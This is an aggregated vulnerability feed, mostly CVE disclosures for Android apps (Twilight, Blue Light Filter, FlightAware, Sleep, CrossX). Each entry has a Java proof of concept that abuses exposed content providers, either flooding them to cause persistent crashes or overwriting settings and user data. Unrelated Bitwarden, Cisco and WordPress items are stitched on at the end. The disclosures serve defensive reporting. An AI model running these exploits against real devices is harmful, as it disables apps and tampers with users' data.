An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Twilight（CVE-2023-29756）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
while(true){
    ContentValues contentValues = new ContentValues();
    String string = getRandomString(10000);
    contentValues.put(string,string);
    contentResolver.insert(parse,contentValues);
}

CVE-2023-29756: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Blue Light Filter（CVE-2023-29757）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change the application's color temperature by modifying the current\_ct field in the SharedPreference file, causing the phone to display abnormally and resulting in an elevation of privilege attack.

poc:

 public void attack\_eye() {
        ContentResolver contentResolver = getContentResolver();
        ContentValues contentValues = new ContentValues();
        Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
        contentValues.put("dim", 50);
        contentValues.put("filter\_capacity", 100000);
        contentValues.put("language\_index", -1);//设置语言
        contentValues.put("current\_ct", 600);//设置当前色温
        contentResolver.insert(uri, contentValues);
    }

CVE-2023-29757: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Blue Light Filter（CVE-2023-29758）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

 public void attack\_eye() {
        while(true) {
            ContentResolver contentResolver = getContentResolver();
            ContentValues contentValues = new ContentValues();
            Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
            String randomString = getRandomString(1000);
            contentValues.put(randomString,randomString);
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29758: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in FlightAware v.5.8.0 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the database files.

**Denial of Service exists in FlightAware（CVE-2023-29759）**

Vendor: FlightAware(https://flightaware.com/)

Affected product: FlightAware(com.flightaware.android.liveFlightTracker)

Version: 5.8.0

Download link： https://play.google.com/store/apps/details?id=com.flightaware.android.liveFlightTracker

Description of the vulnerability for use in the CVE：An issue found in FlightAware v.5.8.0 allows unauthorized apps to cause a persistent denial of service by manipulating the database files.

Additional information: The FlightAware application allows unauthorized applications to modify the data in its database files through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes.

poc:

public void attack\_flightware() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.flightaware.android.liveFlightTracker.FlightAwareContent/airlines");
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("url", getRandomString(10240));
            contentValues.put("name\_zh", getRandomString(10240));
            contentValues.put("iata", getRandomString(10240));
            contentValues.put("icao", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29759: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Sleep v.20230303 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Escalation of Privileges exists in Sleep（CVE-2023-29761）**

Vendor: Urbandroid(http://twilight.urbandroid.org/)

Affected product: Sleep(com.urbandroid.sleep)

Version: 20230303

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.sleep

Description of the vulnerability for use in the CVE：An issue found in Sleep v.20230303 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Sleep application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality.

Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as language, some displays of the interface, and also modify the uri of the alarm bell, resulting in an escalation of privilege attack.

poc:

public void attack\_sleep() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
        ContentValues contentValues = new ContentValues();
        contentValues.put(targetKey, targetValue);
        contentResolver.insert(parse, contentValues);
    }

CVE-2023-29761: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause an escalation of Privileges via the database files.

**Escalation of Privileges exists in CrossX（CVE-2023-29766）**

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause an escalation of Privileges via the database files.

Additional information: The CrossX application allows unauthorized applications to use the methods provided in its exposed components to modify data in the Database file, which is loaded at application startup and affects critical application functionality. For example, modify the user's personal data, resulting in an escalation of privilege attack.

poc:

 public void attack\_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb\_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", targetVaule);
            contentResolver.insert(uri, contentValues);
    }

CVE-2023-29766: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause a persistent denial of service via the database files.

**Denial of Service exists in CrossX（CVE-2023-29767）**

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause a persistent denial of service via the database files.

Additional information: The CrossX application allows unauthorized applications to inject data into the database via interfaces in the components it exposes, which will be loaded from the database into memory upon opening the app. Once an attacker injects an excessive amount of data, it can cause the application to trigger an OOM error and crash. The user cannot completely fix the above problem by restarting the application because the data is stored persistently in the database, which eventually leads to persistent denial of service.

poc:

 public void attack\_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb\_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29767: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Bitwarden Desktop v1.20.0 and above stores the biometric key in plaintext which allows a local attacker to decrypt the entire local vault.

    

**Bitwarden Client Applications**

This repository houses all Bitwarden client applications except the Mobile application.

Please refer to the Clients section of the Contributing Documentation for build instructions, recommended tooling, code style tips, and lots of other great information to get you started.

**Related projects:**

*   bitwarden/server: The core infrastructure backend (API, database, Docker, etc).
*   bitwarden/mobile: The mobile app vault (iOS and Android).
*   bitwarden/directory-connector: A tool for syncing a directory (AD, LDAP, Azure, G Suite, Okta) to an organization.

**We're Hiring!**

Interested in contributing in a big way? Consider joining our team! We're hiring for many positions. Please take a look at our Careers page to see what opportunities are currently open as well as what it's like to work at Bitwarden.

**Contribute**

Code contributions are welcome! Please commit any pull requests against the master branch. Learn more about how to contribute by reading the Contributing Guidelines. Check out the Contributing Documentation for how to get started with your first contribution.

Security audits and feedback are welcome. Please open an issue or email us privately if the report is sensitive in nature. You can read our security policy in the SECURITY.md file.

CVE-2023-27706: GitHub - bitwarden/clients: Bitwarden client applications (web, browser extension, desktop, and cli)

Categories: Exploits and vulnerabilities
Categories: News
Tags: Cisco

Tags:  anyconnect

Tags:  system secure client

Tags:  VPN

Tags:  bug

Tags:  patch

Tags:  update

Tags:  vulnerability

Tags:  SYSTEM

We take a look at a recent update for Cisco Secure System Client and why you should apply the update as soon as possible.



(Read more...)




The post Update your Cisco System Secure Client now to fix this AnyConnect bug appeared first on Malwarebytes Labs.

Cisco Secure Client is the fresh recipient of a fix to address a high-severity vulnerability related to improper permissions. The flaw allows attackers to potentially escalate privileges to the SYSTEM account.

From the vulnerability advisory:

> A vulnerability in the client update feature of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM.
> 
> This vulnerability exists because improper permissions are assigned to a temporary directory that is created during the upgrade process. An attacker could exploit this vulnerability by abusing a specific function of the Windows installer process. A successful exploit could allow the attacker to execute code with SYSTEM privileges.

As Bleeping Computer notes, Secure Client allows for remote work thanks to a secure Virtual Private Network and also gives admins telemetry and endpoint management functionality. The attacks themselves do not need user interaction to get the exploitation ball rolling. Bleeping Computer also mentions that there is no current evidence to suggest active exploitation in the wild. With this in mind, there’s never been a better time to start patching. 

As with so many other vulnerabilities out there, there is no workaround for this issue. What this means is that if you’re delayed applying an update for whatever reason, there’s no way to put a band-aid over the wound until you’re ready to hit the update button. Your setup will simply remain at risk until you do it.

The vulnerable products are as follows:

> Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows.
> 
> Note: For releases earlier than Release 5.0, Cisco Secure Client for Windows is known as Cisco AnyConnect Secure Mobility Client for Windows.

There’s a number of products not at risk from this issue, which are listed below. You’ll note that none of them are Windows.

*   Cisco AnyConnect Secure Mobility Client for Linux
*   Cisco AnyConnect Secure Mobility Client for MacOS
*   Cisco Secure Client-AnyConnect for Android
*   Cisco Secure Client AnyConnect VPN for iOS
*   Cisco Secure Client for Linux
*   Cisco Secure Client for MacOS

This issue has been resolved with the release of Cisco Secure Client for Windows 5.0MR2, and AnyCOnnect Secure Mobility Client for Windows 4.10MR7. If you haven’t already done so, it’s time to check out the Cisco downloads page and make your network a little bit safer.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Update your Cisco System Secure Client now to fix this AnyConnect bug

The PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: A partial fix for the issue was introduced in version 10.0.1, and an additional patch (version 10.0.2) was released to address a workaround.

Tag

#android